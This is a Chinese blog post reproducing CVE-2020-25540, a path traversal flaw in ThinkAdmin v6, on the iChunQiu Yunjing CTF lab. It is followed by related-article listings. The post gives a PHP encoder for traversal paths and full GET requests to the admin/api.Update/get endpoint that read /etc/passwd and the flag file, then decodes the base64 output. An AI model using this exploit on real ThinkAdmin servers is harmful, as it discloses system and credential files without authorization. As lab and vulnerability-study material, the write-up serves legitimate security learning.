云镜CVE-2020-25540复现

最新推荐文章于 2024-05-11 08:31:42 发布
最新推荐文章于 2024-05-11 08:31:42 发布
阅读量534 收藏 1
点赞数 1
分类专栏: 日常练习 漏洞复现 文章标签: php web安全 安全性测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/129231011
版权

CVE-2020-25540复现


🍉 === shell
来源:https://yunjing.ichunqiu.com/cve/detail/851?type=1&pay=2

漏洞信息

漏洞名称ThinkAdmin 路径遍历漏洞
漏洞编号CVE-2020-25540
危害等级高危
漏洞类型路径遍历
漏洞厂商-
漏洞组件-
受影响版本Thinkadmin v6

漏洞概述 : ThinkAdmin是一套基于ThinkPHP框架的通用后台管理系统。
ThinkAdmin 6版本存在路径遍历漏洞。攻击者可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

漏洞复现

数据库报错是因为这个漏洞与数据库无关,大概率是因为文件读取API没做授权导致的,所以直接发送GET请求即可,但请求文件路径需要加密:
菜鸟教程在线PHP环境

<?php 
	function encode($content){
		list($chars, $length) = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
		for ($i = 0; $i < $length; $i++) 
			$chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
		return $chars;}$content="../../../../etc/passwd";
	echo encode($content);
?>

请添加图片描述
这里请求读取/etc/passwd文件
http://eci-2zef7kaeyauuzu7g99q2.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
请添加图片描述
context的内容拉去base64解码:
BASE64在线解码
请添加图片描述

读取flag

同个道理:
获取路径加密后的字符串
请添加图片描述
发送GET请求
http://eci-2zef7kaeyauuzu7g99q2.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b1a1a1b2u302p2v
请添加图片描述
拿去base64解码
请添加图片描述

伽蓝之堂
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
春秋云镜 CVE-2020-25540
qq_22002773的博客
08-07 439
春秋云镜 CVE-2020-25540
CVE-2020-25540:ThinkAdmin未授权列目录/任意文件读取漏洞复现
Jietewang的博客
12-11 2663
1. 简介 ThinkAdmin 是基于 ThinkPHP后台开发框架,在ThinkAdmin v6版本存在路径遍历漏洞,该漏洞可以利用GET请求编码参数读取远程服务器上任意文件。 2. 影响范围 Thinkadmin ≤ 2020.08.03.01 v5(任意文件读取) v6(列目录,任意文件读取) 3. 环境搭建 ThinkAdmin 源码仓库:https://github.com/zoujingli/ThinkAdmin 详细安装过程请查看官方手册,环境搭建过程均来自手...
ThinkAdminV6 CVE-2020-25540 目录遍历文件读取漏洞
3hex的博客
11-23 4556
POC:https://github.com/Schira4396/CVE-2020-25540/blob/main/poc.pyhttps://github.com/Schira4396/CVE-2020-25540/blob/main/poc.py 影响版本: ThinkAdmin版本 ≤ 2020.08.03.01 漏洞详解: https://github.com/zoujingli/ThinkAdmin/issues/244https://github.com/zoujingli/Think
[春秋云镜]CVE-2020-13933
niubi707的博客
12-03 5556
春秋云镜CVE-2020-13933Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。
[春秋云镜]CVE-2020-26042
niubi707的博客
12-08 698
春秋云镜CVE-2020-26042Hoosk CMS v1.8.0 install/index.php 存在sql注入漏洞
[春秋云镜]CVE-2020-2883
niubi707的博客
11-28 318
[春秋靶场]CVE-2020-2883复现
春秋云镜CVE-2022-25411
风依旧的博客
05-16 317
春秋云镜CVE-2022-25411,通过搜索引擎得到上传文件路径/admin/files,将cookie修改为正确口令得到的cookie,发现能成功进入上传页面。如果出现404,就是数据包中缺失index.php路径,自行添加即可。思路是对的,但是admin/admin888依然返回302,将口令带入重放器中尝试。通过搜索引擎,得到/admin/options为登录页面,尝试进入登录页面。尝试上传图片,上传成功。
春秋云境-CVE-2020-17530
qq_63265389的博客
04-15 321
CVE-2019-0230的绕过,Struts2官方对CVE-2019-0230的修复方式是加强OGNL表达式沙盒,而CVE-2020-17530绕过了该沙盒。当对标签属性中的原始用户输入进行评估时,强制 OGNL 评估可能会导致远程代码执行。找一下poc nothing很烦有了Apache Struts 框架在强制时,会对分配给某些标签属性(如 id)的属性值执行双重评估。因此,可以将一个值传递给 Struts,该值将在呈现标签的属性时再次评估。通过精心构建的请求,这可能会导致远程代码执行。
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
cve-2020-2551_poc.py
03-12
cve-2020-2551_poc.py
为什么Redis6.0引入了多线程
最新发布
IT深耕十余载,大道之简
05-11 337
总的来说,Redis 6.0引入多线程是为了提高性能、降低延迟、更好地利用CPU资源,并保持Redis的简单性和高性能特点。这些改进有助于Redis更好地应对不断增长的数据量和并发量需求,同时保持其稳定性和可靠性。Redis 6.0引入多线程的决策是基于其性能优化和适应现代硬件架构的考虑。
PHP 在字符中找出重复次数最多的字符
zzjnlwb的专栏
05-06 425
应该也还有其他很多办法!等我遇到了再更新本篇!我感觉这是最简单的一种办法!
Service 和 Ingress
go|Python的个人博客
05-08 1241
Yaml 文件案例metadata:labels:app: nginx-svc # service 自己的标签spec:ports:- name: http # service 端口配置的名称protocol: TCP # 端口绑定的协议,支持 TCP、UDP、SCTP,默认为 TCPport: 1080 # service 自己的端口targetPort: 80 # 目标 pod 的端口type: NodePort # 默认是ClusterIP 类型,只能在集群内部使用。
WordPress如何判断当前页是否属于文章页或页面?
boke112的博客
05-08 238
我想在WordPress站点的文章页和页面中输出一些内容,其他页面不输出,那么我应该怎么判断当前页是否为文章页或页面呢?下面boke112百科就跟大家简单介绍一下。
宝塔面板如何删除一个站点
程序员老狼专注开发aigc或客服系统应用
05-06 455
我们一般的网站都是PHP+MySQL开发的,所以删除站点,就要先删数据库,再删网站目录 注意:一点要确保无用的再删 删除站点目录
春秋云镜CVE-2020-2551
09-21
春秋云镜是一个安全漏洞扫描平台,它可以帮助用户检测和修复系统中的漏洞。根据引用[2]所提到的信息,春秋云镜可以发现并报告Oracle WebLogic Server产品中的高危漏洞CVE-2020-2551。这个漏洞的CVSS评分为9.8分,表示其危害程度非常高。该漏洞允许攻击者通过基于IIOP协议执行远程代码。因此,春秋云镜可以帮助用户及时发现并修复这个漏洞,以保护系统的安全性

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值